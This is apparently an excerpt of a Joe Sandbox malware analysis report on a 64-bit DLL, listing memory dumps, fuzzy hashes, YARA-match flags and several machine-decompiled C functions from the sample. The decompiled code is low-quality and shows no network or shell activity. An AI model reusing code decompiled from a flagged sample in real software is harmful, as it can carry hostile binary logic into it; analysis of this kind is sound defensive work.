                                                                      • Instruction ID: 4a8c8eb2592349ffd53503bd2f8074f7b88d8b4514a8c381fe781810e2271e54
                                                                      • Opcode Fuzzy Hash: 716ad8316d6b2b976c2c37c6de18297ad8efcdc7f7de0b8cad2bcddf7e667c70
                                                                      • Instruction Fuzzy Hash: D751AE77200E5882E7AE8F29D0543EC3BA4E359B98F148119EF46977D9DF21CE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 523bf1e92e8e2f50f8fef7ccb3099ab3e2f026c84d03bfca64bbfd527f2a1582
                                                                      • Instruction ID: 8c8fccbca2463071fbf894a73c990b22fa6389c1b7b96bf18fea160ed15a6c75
                                                                      • Opcode Fuzzy Hash: 523bf1e92e8e2f50f8fef7ccb3099ab3e2f026c84d03bfca64bbfd527f2a1582
                                                                      • Instruction Fuzzy Hash: 8B515E70E0060A8BEF48DFA8D45A6EEBBB1FB08304F14412DE556E72D0C7789A46CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 56%
                                                                      			E0000000118003BD00(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                      				void* _t24;
                                                                      				int _t26;
                                                                      				signed int _t51;
                                                                      				void* _t52;
                                                                      				signed long long _t66;
                                                                      				signed int* _t73;
                                                                      				signed long long _t75;
                                                                      				signed long long _t77;
                                                                      				signed long long _t78;
                                                                      				signed long long _t95;
                                                                      				signed long long _t96;
                                                                      				signed long long _t98;
                                                                      				signed long long _t104;
                                                                      				long long _t115;
                                                                      				void* _t117;
                                                                      				void* _t120;
                                                                      				signed long long* _t123;
                                                                      				signed long long _t124;
                                                                      				signed long long _t126;
                                                                      				signed long long _t129;
                                                                      				signed long long*** _t132;
                                                                      
                                                                      				_t52 = __edi;
                                                                      				_t51 = __edx;
                                                                      				 *((long long*)(_t117 + 0x10)) = __rbx;
                                                                      				 *((long long*)(_t117 + 0x18)) = _t115;
                                                                      				 *((long long*)(_t117 + 0x20)) = __rsi;
                                                                      				_t66 =  *((intOrPtr*)(__rcx));
                                                                      				_t132 = __rcx;
                                                                      				_t73 =  *_t66;
                                                                      				if (_t73 == 0) goto 0x8003be94;
                                                                      				_t124 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t111 =  *_t73 ^ _t124;
                                                                      				asm("dec eax");
                                                                      				_t75 = _t73[4] ^ _t124;
                                                                      				asm("dec ecx");
                                                                      				asm("dec eax");
                                                                      				if ((_t73[2] ^ _t124) != _t75) goto 0x8003be06;
                                                                      				_t77 = _t75 - ( *_t73 ^ _t124) >> 3;
                                                                      				_t101 =  >  ? _t66 : _t77;
                                                                      				_t6 = _t115 + 0x20; // 0x20
                                                                      				_t102 = ( >  ? _t66 : _t77) + _t77;
                                                                      				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
                                                                      				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0x8003bda2;
                                                                      				_t7 = _t115 + 8; // 0x8
                                                                      				r8d = _t7;
                                                                      				E00000001180046590(_t6, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
                                                                      				_t24 = E0000000118003F8F4(_t66, _t111);
                                                                      				if (_t66 != 0) goto 0x8003bdca;
                                                                      				_t104 = _t77 + 4;
                                                                      				r8d = 8;
                                                                      				E00000001180046590(_t24, _t77, _t111, _t104, _t111, _t115, _t120);
                                                                      				_t129 = _t66;
                                                                      				_t26 = E0000000118003F8F4(_t66, _t111);
                                                                      				if (_t129 == 0) goto 0x8003be94;
                                                                      				_t123 = _t129 + _t77 * 8;
                                                                      				_t78 = _t129 + _t104 * 8;
                                                                      				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                      				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
                                                                      				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0x8003be06;
                                                                      				memset(_t52, _t26, 0 << 0);
                                                                      				_t126 =  *0x80070098; // 0xd02b0a549a3
                                                                      				r8d = 0x40;
                                                                      				asm("dec eax");
                                                                      				 *_t123 =  *(_t132[1]) ^ _t126;
                                                                      				_t95 =  *0x80070098; // 0xd02b0a549a3
                                                                      				asm("dec eax");
                                                                      				 *( *( *_t132)) = _t129 ^ _t95;
                                                                      				_t96 =  *0x80070098; // 0xd02b0a549a3
                                                                      				asm("dec eax");
                                                                      				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
                                                                      				_t98 =  *0x80070098; // 0xd02b0a549a3
                                                                      				r8d = r8d - (_t51 & 0x0000003f);
                                                                      				asm("dec eax");
                                                                      				( *( *_t132))[2] = _t78 ^ _t98;
                                                                      				goto 0x8003be97;
                                                                      				return 0xffffffff;
                                                                      			}
























                                                                      0x18003bd00
                                                                      0x18003bd00
                                                                      0x18003bd00
                                                                      0x18003bd05
                                                                      0x18003bd0a
                                                                      0x18003bd18
                                                                      0x18003bd1d
                                                                      0x18003bd20
                                                                      0x18003bd26
                                                                      0x18003bd2c
                                                                      0x18003bd44
                                                                      0x18003bd4a
                                                                      0x18003bd4d
                                                                      0x18003bd50
                                                                      0x18003bd53
                                                                      0x18003bd59
                                                                      0x18003bd67
                                                                      0x18003bd71
                                                                      0x18003bd75
                                                                      0x18003bd78
                                                                      0x18003bd7b
                                                                      0x18003bd82
                                                                      0x18003bd84
                                                                      0x18003bd84
                                                                      0x18003bd8e
                                                                      0x18003bd98
                                                                      0x18003bda0
                                                                      0x18003bda2
                                                                      0x18003bda6
                                                                      0x18003bdb2
                                                                      0x18003bdb9
                                                                      0x18003bdbc
                                                                      0x18003bdc4
                                                                      0x18003bdd1
                                                                      0x18003bdd5
                                                                      0x18003bded
                                                                      0x18003bdf1
                                                                      0x18003bdf4
                                                                      0x18003bdfc
                                                                      0x18003bdff
                                                                      0x18003be06
                                                                      0x18003be25
                                                                      0x18003be2b
                                                                      0x18003be2e
                                                                      0x18003be41
                                                                      0x18003be4a
                                                                      0x18003be50
                                                                      0x18003be61
                                                                      0x18003be6a
                                                                      0x18003be6e
                                                                      0x18003be7a
                                                                      0x18003be83
                                                                      0x18003be8e
                                                                      0x18003be92
                                                                      0x18003beaf

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: BoundaryDeleteDescriptorErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2050971199-0
                                                                      • Opcode ID: ad37d989a1399f23a232c55ec0f5c1409da1da3ac050b9359d9fc8903b5555da
                                                                      • Instruction ID: f02cffa7854899f18e52ab3b8e11edb702d5f30f9c0fc4791042a6be94c00616
                                                                      • Opcode Fuzzy Hash: ad37d989a1399f23a232c55ec0f5c1409da1da3ac050b9359d9fc8903b5555da
                                                                      • Instruction Fuzzy Hash: EB41B472320A5886EF85CF2AD9543D97391A74CFD8F499126EE0D87B58EF3DC54A8340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 02a684188995345922c9afdc254e5f890dc64c5b7fdf51397b32179a01d6f708
                                                                      • Instruction ID: 04b812a6cb1cc5c3fc122d85244b06eab5ec76f629a6876d01ed23339ea96ee6
                                                                      • Opcode Fuzzy Hash: 02a684188995345922c9afdc254e5f890dc64c5b7fdf51397b32179a01d6f708
                                                                      • Instruction Fuzzy Hash: 2351C071518788CBEBBADF24DC896DA7BB1FB58304F904219D84E8E290DFB4574ACB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d419667b547a92e243f84ef97490428a889141761c3f806213dc23cdfd513faa
                                                                      • Instruction ID: d284a0bff1b1a92d290e15a67bb0b0d41d884af90c2e152b567a2c67f7089d5a
                                                                      • Opcode Fuzzy Hash: d419667b547a92e243f84ef97490428a889141761c3f806213dc23cdfd513faa
                                                                      • Instruction Fuzzy Hash: D251D7701046898BEBB8DF54D8A9BE977A0FB54304F50C12DE9CECE291DFB4468DAB05
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E00000001180028668(long long __rbx, void* __rcx, long long _a16) {
                                                                      				long long _v16;
                                                                      				signed int _v24;
                                                                      				intOrPtr _t54;
                                                                      				void* _t80;
                                                                      				void* _t89;
                                                                      				intOrPtr* _t93;
                                                                      				intOrPtr _t95;
                                                                      				intOrPtr _t97;
                                                                      				void* _t102;
                                                                      				void* _t107;
                                                                      				void* _t112;
                                                                      				void* _t113;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_t54 =  *((intOrPtr*)(__rcx + 0x470));
                                                                      				_t102 = __rcx;
                                                                      				if (_t54 != 1) goto 0x8002868e;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 2) goto 0x800286a0;
                                                                      				goto 0x800287d7;
                                                                      				if (_t54 != 2) goto 0x800286a0;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) == 0) goto 0x800287d7;
                                                                      				_t111 =  *((intOrPtr*)(__rcx + 8));
                                                                      				 *((char*)(__rcx + 0x4c)) = 0;
                                                                      				if ( *((char*)( *((intOrPtr*)(__rcx + 8)) + 0x28)) != 0) goto 0x800286b6;
                                                                      				E000000011800338E0(_t89, __rcx, _t111, _t107, _t112);
                                                                      				_t80 = r8d - 0xffffffff;
                                                                      				if (_t80 < 0) goto 0x80028792;
                                                                      				if (_t80 == 0) goto 0x80028792;
                                                                      				if (( *( *((intOrPtr*)(_t102 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x80028703;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t102 + 0x460)) + 8)) == 0) goto 0x80028717;
                                                                      				if (E00000001180041944(r9d,  *((long long*)( *((intOrPtr*)(_t102 + 0x460)) + 8)),  *((intOrPtr*)(_t102 + 0x460))) == 0xffffffff) goto 0x8002871c;
                                                                      				 *(_t102 + 0x20) =  *(_t102 + 0x20) + 1;
                                                                      				goto 0x80028720;
                                                                      				 *(_t102 + 0x20) =  *(_t102 + 0x20) | 0xffffffff;
                                                                      				_t93 =  *((intOrPtr*)(_t102 + 0x10));
                                                                      				r8b =  *_t93;
                                                                      				 *((long long*)(_t102 + 0x10)) = _t93 + 1;
                                                                      				 *((intOrPtr*)(_t102 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x80028792;
                                                                      				_t95 =  *((intOrPtr*)(_t102 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t95 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t95 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t102 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(_t102 + 8)), _t102,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)))),  *((intOrPtr*)(_t102 + 0x460)), _t112, _t113,  *((intOrPtr*)(_t102 + 8)));
                                                                      				_t97 =  *((intOrPtr*)(_t102 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t97 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t97 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t102 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(_t102 + 8)), _t102,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)))),  *((intOrPtr*)(_t102 + 0x460)), _t112, _t113,  *((intOrPtr*)(_t102 + 8)));
                                                                      				goto 0x800287d9;
                                                                      				if (( *( *((intOrPtr*)(_t102 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x800287b6;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t102 + 0x460)) + 8)) == 0) goto 0x800287ce;
                                                                      				if (E00000001180041944(r8b,  *((long long*)( *((intOrPtr*)(_t102 + 0x460)) + 8)),  *((intOrPtr*)(_t102 + 0x460))) == 0xffffffff) goto 0x800287d3;
                                                                      				 *(_t102 + 0x20) =  *(_t102 + 0x20) + 1;
                                                                      				goto 0x800287d7;
                                                                      				 *(_t102 + 0x20) =  *(_t102 + 0x20) | 0xffffffff;
                                                                      				return 1;
                                                                      			}















                                                                      0x180028668
                                                                      0x180028672
                                                                      0x180028678
                                                                      0x18002867e
                                                                      0x180028687
                                                                      0x180028689
                                                                      0x180028691
                                                                      0x18002869a
                                                                      0x1800286a0
                                                                      0x1800286a4
                                                                      0x1800286ac
                                                                      0x1800286b1
                                                                      0x1800286be
                                                                      0x1800286c2
                                                                      0x1800286d9
                                                                      0x1800286f3
                                                                      0x180028701
                                                                      0x180028715
                                                                      0x180028717
                                                                      0x18002871a
                                                                      0x18002871c
                                                                      0x180028720
                                                                      0x180028724
                                                                      0x18002872a
                                                                      0x18002872e
                                                                      0x180028735
                                                                      0x180028737
                                                                      0x180028740
                                                                      0x180028743
                                                                      0x18002874a
                                                                      0x18002874e
                                                                      0x180028755
                                                                      0x18002875a
                                                                      0x180028760
                                                                      0x180028765
                                                                      0x180028769
                                                                      0x18002876c
                                                                      0x180028773
                                                                      0x180028777
                                                                      0x18002877e
                                                                      0x180028783
                                                                      0x180028789
                                                                      0x180028790
                                                                      0x1800287a6
                                                                      0x1800287b4
                                                                      0x1800287cc
                                                                      0x1800287ce
                                                                      0x1800287d1
                                                                      0x1800287d3
                                                                      0x1800287e3

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ae4010d5c02622d45c3023169cc2fc24815e6c6196ab7ccb4dfcedae1b753b5
                                                                      • Instruction ID: 3a5678472c41ba3675a28a4bf149654bdd87f9c2efeded7d4409bacc4e77e48f
                                                                      • Opcode Fuzzy Hash: 0ae4010d5c02622d45c3023169cc2fc24815e6c6196ab7ccb4dfcedae1b753b5
                                                                      • Instruction Fuzzy Hash: 6741B03A109B8881E7A68F29C0453AE37A0FB49BECF288215EF580B7E5CF35C545D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2be38a0491973a0032a8909769e77a99ca5202ad907bf2f316ceccf1fca314b2
                                                                      • Instruction ID: 15f25dca0fa9ec8dd4d3758a6f0faec625be76cc767f5eec6bd940f66aaff3c2
                                                                      • Opcode Fuzzy Hash: 2be38a0491973a0032a8909769e77a99ca5202ad907bf2f316ceccf1fca314b2
                                                                      • Instruction Fuzzy Hash: DC51B3B091038A8FDB48CF68D88A5DE7BB0FB48358F101A19FC6696264D3B49665CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E00000001180028514(long long __rbx, void* __rcx, long long _a8) {
                                                                      				long long _v16;
                                                                      				signed int _v24;
                                                                      				void* _t72;
                                                                      				void* _t81;
                                                                      				intOrPtr* _t85;
                                                                      				intOrPtr _t87;
                                                                      				intOrPtr _t89;
                                                                      				void* _t94;
                                                                      				void* _t99;
                                                                      				void* _t104;
                                                                      				void* _t105;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t103 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t94 = __rcx;
                                                                      				 *((char*)(__rcx + 0x4c)) = 0;
                                                                      				if ( *((char*)( *((intOrPtr*)(__rcx + 8)) + 0x28)) != 0) goto 0x80028537;
                                                                      				E000000011800338E0(_t81, __rcx, _t103, _t99, _t104);
                                                                      				_t72 = r8d - 0xffffffff;
                                                                      				if (_t72 < 0) goto 0x80028613;
                                                                      				if (_t72 == 0) goto 0x80028613;
                                                                      				if (( *( *((intOrPtr*)(_t94 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x80028584;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)) == 0) goto 0x80028598;
                                                                      				if (E00000001180041944(r9d,  *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)),  *((intOrPtr*)(_t94 + 0x460))) == 0xffffffff) goto 0x8002859d;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 1;
                                                                      				goto 0x800285a1;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0xffffffff;
                                                                      				_t85 =  *((intOrPtr*)(_t94 + 0x10));
                                                                      				r8b =  *_t85;
                                                                      				 *((long long*)(_t94 + 0x10)) = _t85 + 1;
                                                                      				 *((intOrPtr*)(_t94 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x80028613;
                                                                      				_t87 =  *((intOrPtr*)(_t94 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t87 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t87 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t94 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(_t94 + 8)), _t94,  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x18)))),  *((intOrPtr*)(_t94 + 0x460)), _t104, _t105,  *((intOrPtr*)(_t94 + 8)));
                                                                      				_t89 =  *((intOrPtr*)(_t94 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t89 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t89 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t94 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(_t94 + 8)), _t94,  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x18)))),  *((intOrPtr*)(_t94 + 0x460)), _t104, _t105,  *((intOrPtr*)(_t94 + 8)));
                                                                      				goto 0x8002865a;
                                                                      				if (( *( *((intOrPtr*)(_t94 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x80028637;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)) == 0) goto 0x8002864f;
                                                                      				if (E00000001180041944(r8b,  *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)),  *((intOrPtr*)(_t94 + 0x460))) == 0xffffffff) goto 0x80028654;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 1;
                                                                      				goto 0x80028658;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0xffffffff;
                                                                      				return 1;
                                                                      			}














                                                                      0x180028514
                                                                      0x18002851e
                                                                      0x180028522
                                                                      0x180028525
                                                                      0x18002852d
                                                                      0x180028532
                                                                      0x18002853f
                                                                      0x180028543
                                                                      0x18002855a
                                                                      0x180028574
                                                                      0x180028582
                                                                      0x180028596
                                                                      0x180028598
                                                                      0x18002859b
                                                                      0x18002859d
                                                                      0x1800285a1
                                                                      0x1800285a5
                                                                      0x1800285ab
                                                                      0x1800285af
                                                                      0x1800285b6
                                                                      0x1800285b8
                                                                      0x1800285c1
                                                                      0x1800285c4
                                                                      0x1800285cb
                                                                      0x1800285cf
                                                                      0x1800285d6
                                                                      0x1800285db
                                                                      0x1800285e1
                                                                      0x1800285e6
                                                                      0x1800285ea
                                                                      0x1800285ed
                                                                      0x1800285f4
                                                                      0x1800285f8
                                                                      0x1800285ff
                                                                      0x180028604
                                                                      0x18002860a
                                                                      0x180028611
                                                                      0x180028627
                                                                      0x180028635
                                                                      0x18002864d
                                                                      0x18002864f
                                                                      0x180028652
                                                                      0x180028654
                                                                      0x180028664

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b668b39b19a5c008a811b18ffbc892ef36bff2a8882c4d50ffd345a57302695d
                                                                      • Instruction ID: c0c79d2cdd3fd598488dca8624397d056c0b7882e38bb28c650daa9d12ba35b8
                                                                      • Opcode Fuzzy Hash: b668b39b19a5c008a811b18ffbc892ef36bff2a8882c4d50ffd345a57302695d
                                                                      • Instruction Fuzzy Hash: 79418E76204B8881E7A68F2AD0853AD3BA1E749BACF188215EF5D0B7E5CF39C555C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E000000011800287E4(long long __rbx, void* __rcx, long long _a8) {
                                                                      				long long _v16;
                                                                      				signed int _v24;
                                                                      				void* _t72;
                                                                      				void* _t81;
                                                                      				intOrPtr* _t85;
                                                                      				intOrPtr _t87;
                                                                      				intOrPtr _t89;
                                                                      				void* _t94;
                                                                      				void* _t99;
                                                                      				void* _t104;
                                                                      				void* _t105;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t103 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t94 = __rcx;
                                                                      				 *((char*)(__rcx + 0x4c)) = 0;
                                                                      				if ( *((char*)( *((intOrPtr*)(__rcx + 8)) + 0x28)) != 0) goto 0x80028807;
                                                                      				E000000011800338E0(_t81, __rcx, _t103, _t99, _t104);
                                                                      				_t72 = r8d - 0xffffffff;
                                                                      				if (_t72 < 0) goto 0x800288e3;
                                                                      				if (_t72 == 0) goto 0x800288e3;
                                                                      				if (( *( *((intOrPtr*)(_t94 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x80028854;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)) == 0) goto 0x80028868;
                                                                      				if (E00000001180041944(r9d,  *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)),  *((intOrPtr*)(_t94 + 0x460))) == 0xffffffff) goto 0x8002886d;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 1;
                                                                      				goto 0x80028871;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0xffffffff;
                                                                      				_t85 =  *((intOrPtr*)(_t94 + 0x10));
                                                                      				r8b =  *_t85;
                                                                      				 *((long long*)(_t94 + 0x10)) = _t85 + 1;
                                                                      				 *((intOrPtr*)(_t94 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x800288e3;
                                                                      				_t87 =  *((intOrPtr*)(_t94 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t87 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t87 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t94 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(_t94 + 8)), _t94,  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x18)))),  *((intOrPtr*)(_t94 + 0x460)), _t104, _t105,  *((intOrPtr*)(_t94 + 8)));
                                                                      				_t89 =  *((intOrPtr*)(_t94 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t89 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t89 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t94 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E00000001180013858( *((intOrPtr*)(_t94 + 8)), _t94,  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x18)))),  *((intOrPtr*)(_t94 + 0x460)), _t104, _t105,  *((intOrPtr*)(_t94 + 8)));
                                                                      				goto 0x8002892a;
                                                                      				if (( *( *((intOrPtr*)(_t94 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x80028907;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)) == 0) goto 0x8002891f;
                                                                      				if (E00000001180041944(r8b,  *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)),  *((intOrPtr*)(_t94 + 0x460))) == 0xffffffff) goto 0x80028924;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 1;
                                                                      				goto 0x80028928;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0xffffffff;
                                                                      				return 1;
                                                                      			}














                                                                      0x1800287e4
                                                                      0x1800287ee
                                                                      0x1800287f2
                                                                      0x1800287f5
                                                                      0x1800287fd
                                                                      0x180028802
                                                                      0x18002880f
                                                                      0x180028813
                                                                      0x18002882a
                                                                      0x180028844
                                                                      0x180028852
                                                                      0x180028866
                                                                      0x180028868
                                                                      0x18002886b
                                                                      0x18002886d
                                                                      0x180028871
                                                                      0x180028875
                                                                      0x18002887b
                                                                      0x18002887f
                                                                      0x180028886
                                                                      0x180028888
                                                                      0x180028891
                                                                      0x180028894
                                                                      0x18002889b
                                                                      0x18002889f
                                                                      0x1800288a6
                                                                      0x1800288ab
                                                                      0x1800288b1
                                                                      0x1800288b6
                                                                      0x1800288ba
                                                                      0x1800288bd
                                                                      0x1800288c4
                                                                      0x1800288c8
                                                                      0x1800288cf
                                                                      0x1800288d4
                                                                      0x1800288da
                                                                      0x1800288e1
                                                                      0x1800288f7
                                                                      0x180028905
                                                                      0x18002891d
                                                                      0x18002891f
                                                                      0x180028922
                                                                      0x180028924
                                                                      0x180028934

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
